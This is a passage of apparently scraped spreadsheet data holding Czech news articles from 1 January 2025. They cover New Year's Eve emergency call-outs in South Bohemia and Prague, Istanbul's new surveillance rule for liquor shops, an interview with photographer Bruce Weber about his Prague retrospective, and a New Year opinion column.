    <t>Při novoročních oslavách se na Táborsku ztratil muž. Hledal ho vrtulník, nalezli jej ve vedlejší obci Pohřešovaného seniora z Táborska hledali policisté s využitím vrtulníku. „Muž ušel několik kilometrů do vsi poblíž místa, z něhož odešel. Pohřešovaného našel místní obyvatel, který přivolal policisty. Podchlazeného a viditelně zraněného pohřešovaného si převzali záchranáři,“ uvedla mluvčí jihočeské policie Lenka Krausová . Ta navíc dodala, že policie v kraji rána řešila přibližně stovku různých událostí. „Nejčastěji se jednalo o rušení nočního klidu, vzájemné napadání nebo sousedské spory,“ doplnila. Záchranáři na jihu Čech v noci na středu řešili 121 událostí, což je o 70 procent více v porovnání s jinou noční směnou. Ve dvou desítkách případů se jednalo o úrazy nebo jiné problémy spojené s pitím alkoholu . Ošetřili také muže, jehož poranila pyrotechnika. Stalo se to u Lipna na Českokrumlovsku, když mu pyrotechnika vybuchla v ruce a poranila dlaň. „Jednalo se o jediné zranění zábavní pyrotechnikou,“ uvedla mluvčí jihočeských záchranářů Petra Kafková. Jihočeští hasiči při silvestrovské noci zasahovali u 14 požárů popelnic nebo odpadkových košů, čtyř požárů křoví a požáru chatky v Bežerovicích u Bechyně na Táborsku. „Hořela chatka půdorysu asi osm krát osm metrů se škodou 100.000 korun, příčina vzniku se vyšetřuje. Celkem jsme měli 36 událostí,“ uvedl mluvčí hasičů v kraji Vratislav Malý. Dodal, že ve Starých Hodějovicích na Českobudějovicku po půlnoci hořelo asi 40 tújí u rodinného domu. Hasiči oheň zlikvidovali za několik minut.</t>
  </si>
  <si>
    <t>67140</t>
  </si>
  <si>
    <t>20250101_175_3695927653_206e7248f480bce82386.html</t>
  </si>
  <si>
    <t>206e7248f480bce82386</t>
  </si>
  <si>
    <t>Opilci, rvačky, úrazy. Hasiči zasahovali o Silvestru u 64 událostí</t>
  </si>
  <si>
    <t>Opilci, rvačky, úrazy. Hasiči zasahovali o Silvestru u 64 událostí Rvačky, alkoholové kolapsy, ale i tři úrazy způsobené pyrotechnikou, která během nich ztratila status "zábavná". Podívejte se: Malé Nele pomohli cestu do porodnice proklestit policisté | Video: Miroslav Kovacs , se svolením Autor: Romana Netolická Autor Romana Netolická</t>
  </si>
  <si>
    <t>20250101_176_3695940286_423feb8f8ec970a57229.html</t>
  </si>
  <si>
    <t>423feb8f8ec970a57229</t>
  </si>
  <si>
    <t>Při novoročních oslavách se na Táborsku ztratil muž. Hledal ho vrtulník, nalezli jej ve vedlejší obci Při odchodu z oslav silvestra v obci Dírná na Táborsku se ztratil devětašedesátiletý senior. Policisté po něm pátrali celou noc i s pomocí vrtulníku. Našli ho teprve dopoledne v sousední obci, kam sám pěšky došel. Muž je v pořádku. Dírná 12:46 1. ledna 2025 Po seniorovi pátral i policejní vrtulník | Foto: Ondřej Hájek | Zdroj: ČTK Pohřešovaného seniora z Táborska hledali policisté s využitím vrtulníku. „Muž ušel několik kilometrů do vsi poblíž místa, z něhož odešel. Pohřešovaného našel místní obyvatel, který přivolal policisty. Podchlazeného a viditelně zraněného pohřešovaného si převzali záchranáři,“ uvedla mluvčí jihočeské policie Lenka Krausová . Rušení nočního klidu, potyčky a domácí násilí. Policisté evidují během Silvestra tři tisíce zásahů Číst článek Ta navíc dodala, že policie v kraji rána řešila přibližně stovku různých událostí. „Nejčastěji se jednalo o rušení nočního klidu, vzájemné napadání nebo sousedské spory,“ doplnila. Záchranáři na jihu Čech v noci na středu řešili 121 událostí, což je o 70 procent více v porovnání s jinou noční směnou. Ve dvou desítkách případů se jednalo o úrazy nebo jiné problémy spojené s pitím alkoholu . Ošetřili také muže, jehož poranila pyrotechnika. Stalo se to u Lipna na Českokrumlovsku, když mu pyrotechnika vybuchla v ruce a poranila dlaň. „Jednalo se o jediné zranění zábavní pyrotechnikou,“ uvedla mluvčí jihočeských záchranářů Petra Kafková. Jihočeští hasiči při silvestrovské noci zasahovali u 14 požárů popelnic nebo odpadkových košů, čtyř požárů křoví a požáru chatky v Bežerovicích u Bechyně na Táborsku. „Hořela chatka půdorysu asi osm krát osm metrů se škodou 100.000 korun, příčina vzniku se vyšetřuje. Celkem jsme měli 36 událostí,“ uvedl mluvčí hasičů v kraji Vratislav Malý. Dodal, že ve Starých Hodějovicích na Českobudějovicku po půlnoci hořelo asi 40 tújí u rodinného domu. Hasiči oheň zlikvidovali za několik minut. ČTK</t>
  </si>
  <si>
    <t>20250101_177_3695918522_de3af40782ed5a54f3d7.html</t>
  </si>
  <si>
    <t>de3af40782ed5a54f3d7</t>
  </si>
  <si>
    <t>Kam ani Alláh nedohlédne. V Istanbulu nakoupíte kořalku už jen pod dozorem „Velkého bratra“</t>
  </si>
  <si>
    <t>Kam ani Alláh nedohlédne. V Istanbulu nakoupíte kořalku už jen pod dozorem „Velkého bratra“ Istanbul , jedna z oblíbených destinací tzv. eurovíkendů, přitvrzuje v boji proti neřestem. Od Nového roku musí mít všechny prodejny alkoholu a cigaret kamery s nepřetržitým nahráváním, rozpoznáváním obličejů a nočním viděním. redaktorka 1. ledna 2025 Brána orientu na Bosporu , kam ročně míří za zážitky i desetitisíce Čechů, si posvítí na prodejce alkoholu a jejich zákazníky. Ode dneška platí nařízení istanbulského guvernéra, jež přikazuje obchodníkům vybavit se pokročilými bezpečnostními kamerovými systémy. Ty musí budou schopny zaznamenávat 24 hodin denně sedm dní v týdnu, uchovávat nahrané materiály po dobu jednoho měsíce a umožnit snadné vyhledávání v archivovaných videích podle data a času. Kamery musí být instalovány tak, aby zabíraly „prodejní plochu, všechny vchody a východy a parkovací místa z různých úhlů“, píše se v nařízení, které úřad rozeslal provozovatelům teprve na konci listopadu. Musí mít také noční vidění a dostatečné rozlišení, aby mohly nahrávat zřetelně i za šera a umožnily rozpoznávání obličeje. Opatření má zvýšit bezpečnost v okolí prodejen a pomoci v boji proti prodeji lihovin a cigaret nezletilým. A také proti distribuci pančovaného alkoholu , kterého kvůli prudce rostoucím cenám na tureckém trhu stále přibývá. Od začátku listopadu do poloviny prosince zemřelo v Istanbulské provincii na otravu metanolem 37 lidí, oznámil úřad guvernéra. Prodejcům, již by pokyn odmítli splnit nebo to nestihli do 1. ledna 2025, hrozí tučné finanční sankce nebo odebrání licence. Jejich výši dopis od guvernéra přímo nezmiňuje, nicméně od Nového roku Turecko zvedlo daně, poplatky a pokuty podle revaluační sazby 43,9 procenta. Daniel Deyl redaktor Nové pravidlo se vztahuje na licencované prodejny lihovin a kuřiva, tzv. tekely. Slovo tekel (doslova tek = jediná, el = ruka) znamená v turečtině monopol, neboť na prodej lihovin a tabáku měl historicky monopol stát. Dnes jde ale o běžné označení všech specializovaných obchodů s alkoholem . Nařízení se pochopitelně nelíbí prodejcům, pro něž bude pořízení a údržba nového systému nákladem navíc. Ozvaly se i lidskoprávní organizace, podle nichž hrozí únik citlivých biometrických dat. Chytrých kamer se totiž v tureckém veřejném prostoru pod záminkou boje s kriminalitou a terorismem objevuje čím dál víc. A šibeniční termín něco málo přes měsíc, jejž provozovatelé tekelů na splnění dostali, podněcuje i spekulace o jeho vedlejším záměru: vybrat v šestnáctimilionové megapoli (a přilehlé provincii), jež je nejen nelidnatějším městem Turecka , ale také jedním z nejotevřenějších, co se prodeje alkoholu týče, co nejvíce pokut. Ostatně nebylo by to poprvé, co úřady zavětřily příležitost, jak kreativně a na úkor občanů přilepšit veřejným rozpočtům. Například na počátku covidové pandemie, kdy svět zasáhly první lockdowny a globálně vzrostla poptávka po všem, co se dá dělat doma, turecká vláda uvalila dočasnou dodatečnou 50procentní daň na herní konzole. Tradiční turecká pálenka rakı se pije ředěná vodou, což jí dává mléčné zabarvení Berna Namoğlu / Shutterstock.com Turecko je sice většinově muslimská země (99 procent podle oficiálních vládních údajů), konzumace alkoholu , již islám zapovídá, tady ale má svoji historii. Tradičním tureckým alkoholickým nápojem je už od dávných osmanských dob vinná pálenka ochucená anýzem zvaná rakı. Pivo se zde vaří od roku 1890, kdy švýcarští bratři Bomontiové otevřeli v Istanbulu první moderní pivovar (značka Bomonti dnes patří do portfolia mladšího, ale známějšího pivovaru Efes ). A proslulé jsou i thrácké a anatolské vinice. Autoritářský prezident Recep Tayyip Erdoğan , jenž je známým odpůrcem pití i kouření, se pokouší odradit Turky od těchto neřestí už léta. Zákazy prodeje alkoholu během covidových lockdownů, které důvěrně známe i z našich končin, rušil po konci pandemické krize jen s těžkým srdcem. V celém Turecku platí, že v tekelech ani supermarketech se nesmí alkohol prodávat mezi 22.00 a 6.00, byť v praxi se to často obchází. V případě přistižení však provozovateli hrozí pokuta až 2,4 milionu lir (zhruba 1,6 milionu korun). Jiná pravidla platí pro restaurace, bary nebo hotely, kde lze popíjet celou noc. To zajišťuje dostatečný manipulovací prostor, aby restrikce příliš neodrazovaly západní turisty, které turecká ekonomika zoufale potřebuje. Daniel Deyl redaktor Přísně regulovaná je reklama. Nikde v ulicích se nesmí objevit vývěsní štíty nebo třeba slunečníky s logy značek alkoholických nápojů. To ale od loňska tak trochu naráží na nové nařízení, které přikazuje vystavovat ceník nabízených pokrmů a drinků před vchodem do podniku, takže lze běžně spatřit nabídku piv , koktejlů i panáků načmáranou křídou na tabuli vedle dveří. Propagace nejsilnějších hráčů na tureckém trhu s alkoholem si ale našla cestu – pomocí „tajných“ signálů a barevných kódů. Až se budete procházet ulicemi Istanbulu nebo jiného tureckého města, všímejte si, v jakých barvách jsou vyvedeny vývěsní štíty tekelů. Podle toho poznáte, ke které hlavní značce se obchod hlásí. Drtivá většina jich je modrých nebo žlutých. Modré „patří“ největšímu tureckému pivovarskému koncernu Efes . Žlutá je barva dvojky zdejšího trhu, dánské značky Tuborg, jenž stejně jako Efes vaří pivo na předměstí Izmiru . Heslo +1 na sociálních sítích nebo třeba na nálepce na ulici propaguje Efes Pilsen a jeho prodlouženou dobu zrání, %100 znamená opět Tuborg a třeba #Probably je zase skrytou reklamou na Carlsberg, jenž vychází z jeho mezinárodního reklamního sloganu Probably the best beer in the world (Pravděpodobně nejlepší pivo na světě).</t>
  </si>
  <si>
    <t>40080</t>
  </si>
  <si>
    <t>24920</t>
  </si>
  <si>
    <t>20250101_178_3695849880_fd3dd37d33dc65fe0950.html</t>
  </si>
  <si>
    <t>fd3dd37d33dc65fe0950</t>
  </si>
  <si>
    <t>Pražští policisté se po silvestrovské půlnoci nezastavili. Devět zraněných od zábavní pyrotechniky</t>
  </si>
  <si>
    <t>Pražští policisté se po silvestrovské půlnoci nezastavili. Devět zraněných od zábavní pyrotechniky Foto: HZS Praha Hlavní město Praha V souvislosti oslavami Nového roku policisté v Praze až do půlnoci neřešili žádné zásadní problémy a použití zábavní pyrotechniky v zakázaných oblastech pouze v minimální míře. Úderem půlnoci došlo k navýšení počtu použití pyrotechniky především v oblasti Václavského a Staroměstského náměstí , které policisté na místě okamžitě řešili. V průběhu noci policisté přistihli přímo při odpalování pyrotechniky v centru města bezmála padesát osob z nichž se v drtivé většině jednalo o cizince. Těmto přestupcům policisté na místě uložili pokutu v řádech až několika tisíc korun. Nicméně krátce po půlnoci a to během velmi krátké chvíle rapidně vzrostla oznámení na tísňovou linku 158. Ta se týkala především menších požárů a velkého množství potyček, konfliktů a to na celém území hlavního města a dalších mnoha událostí spojených s pitím alkoholu . Policisté například v průběhu Silvestrovské noci zadrželi muže, který bezpečnostním kladívkem rozbíjel okna u zaparkovaných vozidel v Praze 10, kdy celkem poškodil deset vozidel. Dále krátce po půlnoci po policejním vozidle na Smetanově nábřeží hodil muž s bezmála třemi promile skleněnou láhev a při jeho následné kontrole byl velmi agresivní a chtěl se s policisty prát. Policisté prověřovali několik oznámení týkající se napadání mezi větším množství osob, nicméně po příjezdu na místo se zde již v drtivé většině nikdo nenacházel. Dále jsme řešili konflikt na ubytovně, kde probíhala v pronajatém bytě silvestrovská oslava. Při konfliktu jedna osoba utrpěla řezné poranění a na místo musela být přivolána záchranná služba. V současné chvíli věc prošetřujeme pro podezření z trestného činu pokus těžké újmy na zdraví, ze kterého je podezřelá osmnáctiletá dívka. Policisté v průběhu noci několikrát asistovali záchranné službě v souvislosti s resuscitací osob za pomoci defibrilátoru, dále řešili dvě výhrůžky sebevraždou, kdy se naštěstí podařilo obě osoby včas vypátrat a předat do rukou zdravotníků. Vyhodnocení: Ze strany použití pyrotechniky hodnotíme letošní Silvestr jako jeden z nejklidnějších, nicméně od půlnoci se pražští policisté na tísňové lince, ale i po celé Praze prakticky nezastavili a stejně jako v loňském roce řešili bezmála tisíc oznámení. Hasiči řešili srovnatelný počet událostí jako v předchozích letech „Hasiči hlavního města Prahy zaznamenali během silvestrovské noci zvýšený počet výjezdů. Celkem zasahovali u 33 požárů, které byly přímo způsobeny neodborným používáním pyrotechniky. Nejčastěji hořely odpadkové koše, porosty a zbytky po pyrotechnice (balení, krabice…). Většina událostí se koncentrovala do doby mezi 1. a 2. hodinou ranní. Větší zásah si vyžádal požár předmětů na balkóně v ulici Spálená, který byl rovněž způsoben pyrotechnikou. V rámci příprav sloužily výjezdové jednotky v běžném početním stavu, podpořeny byly vybranými jednotkami sborů dobrovolných hasičů, které držely pohotovost na zbrojnicích. Operační středisko sloužilo v plném početním stavu, tedy 14 příslušníků. Ve spolupráci s PČR a ZZS hl. m. Prahy bylo na Staroměstském náměstí přítomno jedno hasičské družstvo vybaveno cisternovou automobilovou stříkačkou a zásahovou čtyřkolkou. Celkově byl počet požárů způsobených pyrotechnikou během této silvestrovské noci srovnatelný s předchozími roky,“ uvedl mluvčí hasičů Vojtěch Sosna. Devět zranění od zábavní pyrotechniky „Během silvestrovské noci jsme vyjeli k celkem 348 případům. Přímo v souvislosti s novoročními oslavami jsme zasahovali u 100 událostí, přičemž v 9 případech šlo o zranění způsobená zábavní pyrotechnikou. Ve speciálu Golem bylo ošetřeno celkem 27 pacientů, z nichž 13 bylo transportováno do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra,“ sdělil za pražské záchranáře mluvčí Karel Kirs. kpt. Eva Kropáčová Policie ČR Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Eva Kropáčová Autor person Eva Kropáčová</t>
  </si>
  <si>
    <t>20250101_179_3695769684_16e9ca7b1bf37e505e70.html</t>
  </si>
  <si>
    <t>16e9ca7b1bf37e505e70</t>
  </si>
  <si>
    <t>Foťák mi pomáhá seznámit se s&amp;nbsp;lidmi, říká plachý fotograf hvězd a módních ikon Bruce Weber</t>
  </si>
  <si>
    <t>Foťák mi pomáhá seznámit se s&amp;nbsp;lidmi, říká plachý fotograf hvězd a módních ikon Bruce Weber „Jsem docela stydlivý člověk, což může být šokující, ale je to tak,“ říká o sobě Bruce Weber. • Zdroj: Michael Murphy Ještě do 19. ledna bude Praha hlavním městem portrétní, módní a lifestylové fotografie. Až do té doby zůstává v Domě U Kamenného zvonu přístupná retrospektivní výstava amerického fotografa Bruce Webera, která právě v Praze vznikla. „Výstava teď bude cestovat, mluvíme o Itálii , ale třeba i o Jižní Koreji . Ale nevím, jestli ještě někde najde tak dobrý domov, jaký má v Praze ,“ říká Bruce Weber pro e15 magazín. Bruce Weber strávil letos v září v čase výstavy My Education dva nabité týdny v Praze . Také o nich jsme si povídali v online hovoru, na který si našel čas v autě, když právě s manželkou, filmovou producentkou Nan Bushovou, cestoval na Floridu. „Máme pět psů a spolu s našimi přáteli, kteří nám pomáhají, jedeme do Miami do našeho domu v Golden Beach. Místo s tímhle jménem jsme si nevybrali proto, že chováme zlaté retrívry, to jen náhodou se jmenuje stejně jako naši psi,“ říká fotograf a filmař. Zmínka o retrívrech k povídání o jeho díle zcela patří. Zlaté retrívry, které na výstavě také uvidíte, už mnoho let chová a věnoval jim i rozsáhlou fotografickou knihu The Golden Retriever Photographic Society. V čase zářijové vernisáže byl Bruce Weber v Praze teprve podruhé v životě. Poprvé tu byl pracovně v roce 2000, kdy fotografoval sérii s hercem Heathem Ledgerem při natáčení scén k filmu Příběh rytíře. „Ale z Prahy jsem mnoho neviděl, protože jsem byl pořád ve studiu. Teď jsem byl ohromen především tím, jak krásná je pražská architektura. Ty staré budovy a pak také docela podivné nové budovy. A co mě nejvíce ohromilo, byli lidé. Opravdu zajímaví lidé, jiní než například v Paříži , Římě nebo Londýně ,“ vzpomíná. Weberova retrospektiva v Galerii hlavního města Prahy (GHMP) vznikla díky vizi kreativního producenta Miloshe Harajdy, který je velkým obdivovatelem fotografova díla. Připravovala se v těsné spolupráci Webera s Harajdou a vedením GHMP. Harajda připomíná emotivní moment, když Weber v Praze U Kamenného zvonu poprvé viděl výběr z pěti dekád svého fotografování nainstalovaný. „Procházeli jsme celou výstavu s Brucem a jeho manželkou, s celým týmem a spolupracovníky asi čtyři hodiny a on k tomu neměl jedinou poznámku, nepožádal o výměnu nebo prohození jediné fotky. Jiní umělci naopak často nedokážou potlačit své ego, takový Bruce Weber není,“ uvedl Harajda. VIDEO: Výstava Bruce Webera v Domě u Kamenného zvonu: Weber se nad připomínkou tohoto momentu směje. „Před rokem v létě jsme strávili společný čas s organizátory výstavy, ředitelkou muzea, kurátorkou a vzájemně jsme se poznali, napojili na sebe a porozuměli jsme si, mám ty lidi rád. Jsme teď jako rodina,“ vysvětluje s odkazem na ředitelku GHMP Magdalénu Juříkovou a kurátorkou Helenou Musilovou . Fotograf dodává, že důvodem, proč se rozhodl pro výstavu v Praze , byl i Dům U Kamenného zvonu. „Ta budova se mi opravdu moc líbila. A bylo pro mě překvapením, že může fungovat dohromady s fotografiemi a filmy, přestože je velmi členitá. V podstatě se tam na výstavu vydáváte jako na cestu,“ popisuje. Bruce Weber měl za svou kariéru už mnoho výstav, jak ale říká, není pro něho jednoduché se do přípravy expozice vůbec pustit. „Víte, spousta lidí výstavy miluje, ale já nejsem jejich velký fanoušek. Protože uspořádat výstavu vám zabere kus života. Proto taky spoustu výstav pořádají umělci, kteří už nežijí. Oni čas mají,“ žertuje umělec. Pražská událost byla pro Bruce Webera příležitostí setkat se s mnoha přáteli a spolupracovníky, které nasbíral během své kariéry. „Večery kolem vernisáží jsme prožívali, jako kdybychom měli každý den svatební hostinu. Na soukromou i veřejnou vernisáž přiletělo asi osmdesát hostů z celého světa, a to Bruceových spolupracovníků, bývalých modelů, booking agentů, vydavatelů a dalších,“ popisuje Milosh Harajda. Mezi významnými hosty Harajda vypichuje Jonathana Newhouse, dědice impéria Conde Nast , které vydává tituly jako Vogue , The New Yorker , Vanity Fair , Glamour, GQ a další. „Jonathan byl jednou z prvních mezinárodních osobností, jež potvrdila svou účast. Druhým z velkých hostů byl Benedikt Taschen, německý vydavatel, který plánuje vydat Bruceovi knížku pojmenovanou stejně jako pražská výstava,“ připomíná producent. Šestisetstránková kniha od Taschenu by mohla být k dostání v závěru pražské výstavy, tedy v lednu 2025. A proč vlastně Bruce Weber zvolil název My Education? „Měl jsem v životě opravdu štěstí, že jsem potkal skvělé učitele. A nebyli to nutně učitelé v pravém smyslu slova, někteří byli fotografové, někteří byli mí přátelé. Jsem hodně zvídavý člověk, a tak jsem se ptal lidí, které jsem znal, a oni mě učili věci o lidské povaze, o tom, jak žít dobrý život nebo třeba bláznivý život, jak to zvládnout. To bylo moje vzdělání. Myslím, že jsem se toho víc naučil tímto způsobem než ve škole,“ říká osmasedmdesátiletý fotograf. Hned však také zmiňuje své studium kromě jiného na filmové škole Newyorské univerzity ve čtvrti East Village. „To bylo v době, kdy tam rockový promotér Bill Graham pořádal Fillmore East. A tak jsme měli kolem sebe všechny ty kapely, které tam neustále hrály. Bylo to docela divoké místo na to, chodit tam do školy. Bylo to ale nádherné,“ zmiňuje i své učitele fotografie. „Velmi vzpomínám na fotografku Diane Arbusovou , před mnoha lety jsem ji poznal díky mojí učitelce Lisette Modelové, u níž jsem studoval na The New School ,“ říká fotograf. Kurátoři: Helena Musilová , Nathaniel Kilcer Kreativní producent: Milosh Harajda Architekt: Marek Cpin Výstava v Domě U Kamenného zvonu Galerie hlavního města Prahy přístupná do 19. 1. 2025 představuje kromě módní fotografie také umělcovu portrétní, reportážní a krajinnou tvorbu, stejně jako hudební a módní videoklipy i celovečerní filmy. Výstava vznikla za podpory společnosti Carollinum a nadačního fondu The House. A pokračuje, že se ho lidé ptají, jak se naučit fotografovat, kam chodit do školy nebo co fotit. „Ale já si myslím, že není ani nutné hned rozhodnout, co chcete fotografovat. To je přece bláznovství. Naopak je fajn setkat se s jinými fotografy, mluvit s nimi a zjistit, že všichni vlastně tak nějak fotografujeme svůj vlastní život. Helmut Newton mi jednou řekl, že vlastně pořád fotíme ten samý obrázek – je to jako portrét nás samotných. Tahle výstava tedy obsahuje hodně mých portrétů, a možná to pro některé lidi bude příliš nudné. Nebo taky ne,“ vysvětluje fotograf. My Education překvapí portréty osobností ze světa módy, výtvarného umění, sportu, tance a hudby. Najdete na ní ale i sociální témata, jako jsou fotografie vězňů, nebo vhled do rozsáhlých reportáží z amerických měst či například z Vietnamu . Během prvního týdne svého pobytu v Praze Bruce Weber zároveň s přípravou výstavy pracoval – fotil velký editorial pro italský magazín ICON, který připravuje reportáž z Prahy nazvanou Love Letter to Prague. „Fotografoval jsem skvělé tanečníky baletu, navštívili jsme malý boxerský klub… Tam jsem potkal jednoho chlapa, který vypadal jako herec z dávných let, John Garfield . Měl ten klasický vzhled opravdového tvrďáka. Udělali jsme s boxery spoustu snímků, budou součástí příběhu pro magazín Icon. A pak jsme je pozvali na výstavu, což bylo zábavné – vidět je v úplně jiném prostředí. Všichni ti boxeři byli najednou v oblecích, vázankách, perfektně upravení,“ popisuje Weber. Do vyprávění tak vtahuje svoje další oblíbená fotografická témata, box i balet. „Ta kombinace je zvláštní, ale obě skupiny mají hodně společného, protože obojí to jsou tanečníci,“ komentuje. Bruce Weber se v Praze nehnul bez foťáku. Jak říká, dělá to tak vždycky. Fotil i na své vlastní výstavě ty, kdo si fotili jeho. „Skvělé na tom, když máte foťák, je, že přijdete za lidmi a oslovíte je: ,Můžu si vás vyfotit?‛ Foťák vám pomáhá seznamovat se s lidmi. Já jsem docela stydlivý člověk, což může být šokující, ale je to tak,“ říká. Líčí, že v Praze zažíval při fotografování neznámých lidí svobodu. „Tohle už nemůžete dělat v New Yorku . Když tam budete na ulici fotit lidi, budou na vás křičet, odejdou, nebo se hned ptají: ,Kolik mi za to zaplatíte? K čemu použijete tu fotku?‛ A tohle mi v Praze nikdo neřekl. Vrátilo mě to do minulosti, kdy jsem strávil nějaký čas ve Švédsku , kde jsem si to opravdu zamiloval. Mohl jsem tam fotit lidi, kteří říkali: ,Jé, děkuji moc!‛ Zatímco v New Yorku vám ukazují prostředníček,“ přiznává fotograf. A jako příklad, jak ho fotografování sbližuje s lidmi, přidává historku s legendárním hudebníkem Tomem Waitsem . „Vzal jsem ho na 42. ulici, kde tehdy byly samé striptýzové kluby, zapadlé bary a podobná místa. Miloval jsem grafiku na stěnách těch striptýzových podniků, tak jsem tam fotil Toma. Měl na sobě své tvídové sáčko a tvídovou čapku. A Tom , který vždycky mluví, jako by se právě probudil, mi říká: ‚Co to děláš? Snažíš se mi zničit reputaci?‘ Vždycky mu hodně záleželo na jeho imagi. A pak mi Tom volával ve tři čtyři ráno: ,Co děláš, nechceš zajít na pár piv ?‛ Chci tím říct, jak vám foťák pomáhá poznávat lidi,“ vypráví umělec. Vztah k člověku na druhé straně fotoaparátu je v díle Bruce Webera naprosto klíčovým momentem. Připomněla to kurátorka výstavy Helena Musilová , při komentované prohlídce v Domě U Kamenného zvonu, když představovala návštěvníkům místnost věnovanou Bruceově portrétní fotografii. „Zásadní pro tvorbu Bruce Webera je, že ti lidé s ním byli schopní dostat se na stejnou vlnu, byli schopní s ním mluvit, otevřeli mu spoje ateliéry, srdce, názory,“ uvedla Musilová . Dokládala to portréty fotografovaných osobností, z nichž s některými se fotograf setkával opakovaně třeba v průběhu dvaceti let. Ty jsou v instalaci doprovozené menšími, osobnějšími snímky, jež, jak Musilová zdůraznila, ukazují Bruce Webera jako člověka, který je schopný pochopit lidi, jež fotografuje. Na snímcích v této sekci najdeme třeba sochařku Louise Bourgeoisovou , režiséra Pedra Almodóvara , architektku Zahu Hadid, básníka Allena Ginsberga , malíře Andrewa Wyetha , výtvarníka Marka Bradforda, malíře Balthuse, spisovatele a hudebního skladatele Paula Bowlese a další. Vedle toho Weber fotil přední modelky včetně naší Evy Herzigové , ale i Naomi Campbellovou nebo Kate Mossovou , herce od Keanu Reevese po Johnnyho Deppa , muzikanty od Jackson Five po Davida Bowieho . Všechny je U Kamenného zvonu uvidíte. VIDEO: Bruce Weber hovoří o přípravách pražské výstavy: I ve světle mnoha velkých jmen je překvapivé, že se Weber považuje za člověka plachého. Vrací se k tomu i v závěru našeho povídání. „Zrovna dneska ráno jsem se díval na fotky z pražské výstavy a přemýšlel jsem o tom, jak je pro mě traumatizující mít výstavu. Protože lidé se na vás dívají naživo. Jste tam a zároveň si prohlížejí vaši práci. A ve vaší práci jste vlastně úplně obnažený, nemáte se za co schovat,“ přiznává a dodává, že podobné pocity má i s vydáváním knih. „Když mi vyjde kniha a je to zrovna kolem Vánoc, zajdu do knihkupectví, podívám se na ni a okamžitě odcházím. Nezůstávám tam, protože to nezvládnu.“ O to více je pro něj důležité, že v Praze cítil přijetí. „Lidé tam byli neuvěřitelně vstřícní, otevřeli nám své náruče a srdce pro tuto výstavu. Byla to pro mě opravdu pocta, byl jsem dojatý. Právě kvůli tomu budu mít navždy pro Prahu slabost.“ Autor: Martin Filip Autor person Martin Filip</t>
  </si>
  <si>
    <t>113970</t>
  </si>
  <si>
    <t>158000</t>
  </si>
  <si>
    <t>20250101_18_3698115369_87d64e79181fd69d41ab.html</t>
  </si>
  <si>
    <t>87d64e79181fd69d41ab</t>
  </si>
  <si>
    <t>Nenechme se rozdělovat!</t>
  </si>
  <si>
    <t>Nenechme se rozdělovat! Poslední okamžiky roku jedny svádí k rekapitulaci, druhé ženou k rychlému formulování předsevzetí a slibů do nového roku. A někdo chce stát stranou toho všeho a v tichu si užít konce roku. S koncem starého roku chceme všechno špatné nechat za sebou a zároveň s nadějí vyhlížíme možnosti roku nového, výzvy, šance na změny… Ideálně v kombinaci s optimismem! Rekapitulovat lze i průběžně, jak jde život den za dnem… Předsevzetí a sliby si „stavět“ ad hoc v průběhu roku… A poselství? To je bez jakékoli ironie disciplína vyžadující určitou životní moudrost. Pro mne jsou poselstvím lidsky jednoduché vzkazy křesťanství, předávané tisíciletí z generace na generaci, nezpochybnitelné desatero, systém základních hodnot, i když třeba průběžně a operativně dolaďovaný staletími do aktuálních podob… Každodenní inspirace, nový rok nevyjímaje. V širším slova smyslu je ale poselstvím samozřejmě každý „vzkaz“, resp. zpráva s významem. Nese ho kniha, píseň, obraz, dopis… Nebo i průzkum veřejného mínění. Odlehčuji, ale v podstatě i to je prostor pro poselství. Tak je třeba možné „číst“ i s koncem roku zveřejněné závěry šetření agentury Median pro Psychologický ústav AV ČR zaměřeného na téma, co Čechy spojuje. Ukázaly se očekávané i zajímavé výsledky (záměrně je neoznačuji za neočekávané…). Každý z nás, kdo se narodil Čechem nebo se jím cítí, svůj národ zná. Víme, co je pro nás charakteristické, podobně vnímáme nálady ve společnosti, trápí a těší nás obdobné situace a stavy… Možná jste zprávy o tomto průzkumu v médiích i přes rodinná setkání nebo vánoční pohádky zaregistrovali, pak tedy víte, že nás dokáže i pět let po své smrti spojit osobnost a charisma Karla Gotta nebo hokej a pivo . Někdo by hlasoval třeba pro Járu Cimrmana, fotbal a víno , ale většina národa je většina národa, naštěstí ale s právem na vlastní názor a možnost jeho veřejného vyjádření. Pozitivní je, že do roku 2025 podle tohoto šetření vstupujeme s mírným optimismem. Pohled na to, jestli ten příští rok bude horší, stejný nebo lepší náš národ dělí zhruba na třetiny. Takže to s tou „blbou náladou“ ve společnosti nejspíš nebude zase tak špatné, tedy rozhodně ne černobílé. Jsme naštěstí obecně mírní optimisté, i když třeba i trochu švejkovsky lavírujeme nebo rezervovaně čekáme, jak to nakonec dopadne, aby někteří na konci mohli říct „já jsem to říkal…“. Optimistu nějaká odchylka nerozhází a rada pro pesimisty – hlavu vzhůru a jako antidotum může zafungovat jednoduché přísloví „žádná kaše se nejí tak horká, jak se uvaří“. Dlouhodobě nás tedy nejvíce spojuje sport (v čele se zmiňovaným hokejem), kultura (národní dějiny a tradice) a ochota pomoci v nouzi (solidarita, charita, dobročinnost). Za hlubší zamyšlení (nejspíš každý sám nad sebou, přístupem v rodině aj.) možná pak stojí fakt, že hodnotově laděné motivy jako demokracie, svoboda a humanismus byly zastoupeny velmi okrajově. Podle vyjádření zástupce realizátorů projektu za tím může být mnohé… celkový kontext, přílišná abstraktnost, ale i hlubší problém ve společnosti postižené postupnou absencí hodnot a principů, které zároveň v lidech posilují ochotu hledat pojítka a překonávat vše, co může rozdělovat. A není asi překvapivé, jak dopadla „národní povaha“. Jsme sebekritičtí, často negativisté, mnohdy věčně nespokojení a stěžující si na všechno a všechny, objevuje se mezi námi i závist, nenávist, strach a švejkování (v negativním slova smyslu), ale dokážeme být i optimističtí, šikovní, vynalézaví a máme smysl pro černý humor… Ale neházejme to všechno do jednoho pytle a 